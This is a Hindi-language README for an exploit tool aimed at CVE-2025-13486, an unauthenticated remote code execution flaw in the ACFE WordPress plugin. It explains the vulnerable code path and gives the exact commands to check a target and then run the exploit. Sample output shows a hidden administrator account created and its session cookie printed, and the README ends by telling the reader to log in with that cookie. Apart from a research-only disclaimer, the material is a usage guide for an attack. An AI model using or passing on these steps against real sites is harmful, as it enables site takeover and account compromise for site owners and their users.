
CVE-2025-13486 - दूरस्थ कोड निष्पादन और विशेषाधिकार वृद्धि एक्सप्लॉइट
Marcin Dudek (dudekmar) द्वारा खोजे गए CVE-2025-13486 के लिए एक्सप्लॉइट
यह रिपॉजिटरी केवल अनुसंधान और रक्षात्मक सुरक्षा उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
WordPress के लिए Advanced Custom Fields: Extended (ACFE) प्लगइन, संस्करण 0.9.0.5 से 0.9.1.1 में रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है।
यह भेद्यता prepare_form() फ़ंक्शन में मौजूद है, जो उपयोगकर्ता-नियंत्रित इनपुट को स्वीकार करता है और उसे बिना उचित सत्यापन के call_user_func_array() को भेज देता है।
यह बिना प्रमाणीकरण वाले हमलावरों को सर्वर पर सीमित तरीके से मनमाना PHP कोड निष्पादित करने की अनुमति देता है, जो फिर भी एक व्यवस्थापक खाता बनाने और लॉग इन करने के लिए पर्याप्त है।
भेद्यता श्रृंखला इस प्रकार है:
includes/modules/form/module-form-front.php:24 -> wp_ajax_nopriv_acfe/form/render_form_ajax एक्शन render_form_ajax हैंडलर को ट्रिगर करता है।
includes/modules/form/module-form-front.php:492 -> फ़िल्टर acfe/form/prepare_form लागू होता है, जो prepare_form() फ़ंक्शन को कॉल करता है।
includes/modules/form/module-form-front-render.php:151 -> उपयोगकर्ता-नियंत्रित $form डेटा सीधे call_user_func_array() को पास किया जाता है।
Python निर्भरताएँ स्थापित करें:
python3 -m venv venv
venv/bin/pip install -r requirements.txt
एक संवेदनशील WordPress लक्ष्य की पहचान करें।
लक्ष्य में ACFE-जनित फॉर्म वाला एक पेज होना चाहिए।
venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
आउटपुट उदाहरण:
[2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
[2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
स्क्रिप्ट को --exploit फ़्लैग के साथ फिर से चलाएँ:
venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
आउटपुट उदाहरण:
[2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
[2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
[2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
[2025-12-19] [11:00:14] [success] Authentication succeded!
[2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
नव निर्मित व्यवस्थापक खाते में लॉग इन करने के लिए लौटाई गई WordPress प्रमाणीकरण कुकी का उपयोग करें।